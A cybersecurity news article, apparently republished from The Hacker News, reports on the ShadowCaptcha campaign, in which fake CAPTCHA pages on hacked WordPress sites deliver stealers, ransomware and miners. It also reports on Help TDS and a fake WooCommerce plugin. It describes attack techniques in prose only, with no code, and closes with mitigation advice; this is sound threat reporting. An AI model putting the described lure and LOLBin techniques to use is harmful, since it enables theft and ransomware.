A new large-scale campaign exploits over 100 compromised WordPress sites to direct visitors to fake CAPTCHA verification pages. This campaign employs the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners.
The large-scale cybercrime campaign, which researchers first detected in August 2025, is codenamed ShadowCaptcha by the Israel National Digital Agency.
Researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman stated, “The campaign […] blends social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain a foothold in targeted systems.”
They further explained, “The ultimate objectives of ShadowCaptcha include collecting sensitive information through credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit profits, and even causing ransomware outbreaks.”
How the Attack works
The attacks begin when unsuspecting users visit a compromised WordPress website injected with malicious JavaScript code. This code initiates a redirection chain that takes users to a fake Cloudflare or Google CAPTCHA page.
From this point, the attack chain forks into two paths, depending on the ClickFix instructions displayed on the web page. One path utilizes the Windows Run dialog, while the other guides the victim to save a page as an HTML Application (HTA) and then run it using mshta.exe.
The execution flow triggered via the Windows Run dialog culminates in the deployment of Lumma and Rhadamanthys stealers through MSI installers launched using msiexec.exe or via remotely-hosted HTA files run using mshta.exe. In contrast, executing the saved HTA payload results in the installation of Epsilon Red ransomware.
It’s important to note that CloudSEK documented the use of ClickFix lures to trick users into downloading malicious HTA files for spreading Epsilon Red ransomware last month.
The researchers explained, “The compromised ClickFix page automatically executes obfuscated JavaScript that uses ‘navigator.clipboard.writeText’ to copy a malicious command to the user’s clipboard without any interaction, relying on users to paste and run it unknowingly.”
These attacks utilize anti-debugger techniques that prevent inspection of web pages using browser developer tools. Additionally, they rely on DLL side-loading to execute malicious code under the guise of legitimate processes.
ShadowCaptcha
Some ShadowCaptcha campaigns have been observed delivering an XMRig-based cryptocurrency miner. Notably, some variants fetch the mining configuration from a Pastebin URL rather than hard-coding it in the malware, allowing them to adjust parameters on the fly.
In cases where the miner payloads are deployed, attackers have also been observed dropping a vulnerable driver (WinRing0x64.sys) to achieve kernel-level access and interact with CPU registers, aiming to improve mining efficiency.
Among the infected WordPress sites, a majority are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, Spanning sectors such as technology, Hospitality, Legal/finance, Healthcare, and real estate.
WordPress Websites Compromised
The exact method of compromising these WordPress sites remains unclear. However, Goldman informed The Hacker News that there is medium confidence that attackers gained access through various known exploits in a variety of plugins, and in some instances, they used the WordPress portal with Compromised Credentials.
To Mitigate the risks posed by ShadowCaptcha, organizations must train users to be Vigilant against ClickFix campaigns, segment networks to prevent lateral movement, and ensure WordPress sites remain Up-to-date and secured using Multi-factor Authentication (MFA) protections.
The researchers Concluded, “ShadowCaptcha demonstrates how Social-engineering attacks have evolved into Full-spectrum cyber operations. By Tricking users into running built-in Windows tools and Layering Obfuscated scripts and vulnerable drivers, operators gain Stealthy Persistence and can pivot between data theft, crypto mining, or Ransomware.”
This disclosure Coincides with GoDaddy’s Detailing of the evolution of Help TDS, a traffic distribution system active since 2017 and linked to malicious schemes like VexTrio Viper. Help TDS provides partners and Affiliates with PHP code Templates Injected into WordPress sites, ultimately Directing users to Malicious destinations based on targeting criteria.
Security researcher Denis Sinegubko stated, “The operation specializes in tech support scams Utilizing Full-screen browser Manipulation and exit prevention techniques to trap victims on Fraudulent Microsoft Windows security alert pages, with Fallback Monetization through dating, Cryptocurrency, and Sweepstakes scams.”
Notable malware campaigns Leveraging Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages use JavaScript to force browsers into Full-screen mode, Displaying Fraudulent alerts and even featuring Counterfeit CAPTCHA challenges to Sidestep Automated security Scanners.
Malicious WordPress Plugin
Help TDS operators have developed a Malicious WordPress plugin known as “woocommerce_inputs” between late 2024 and August 2025. This plugin enables Redirection Functionality while Steadily adding features for Credential Harvesting, Geographic Filtering, and advanced evasion techniques. Experts estimate that it installs on over 10,000 sites worldwide.
The Malicious plugin Masquerades as WooCommerce to evade Detection by site Owners. Attackers exclusively install it after Compromising WordPress sites through stolen administrator Credentials.
GoDaddy stated, “This plugin serves as both a traffic monetization tool and credential harvesting mechanism, demonstrating continuous evolution from simple redirect functionality to a sophisticated malware-as-a-service offering.”
They further explained, “By providing ready-made solutions, including C2 infrastructure, Standardized PHP Injection Templates, and Fully-featured Malicious WordPress plugins, Help TDS has lowered the barrier to entry for Cybercriminals seeking to Monetize Infiltrated websites.”
Source: TheHackerNews
Read more at Impreza News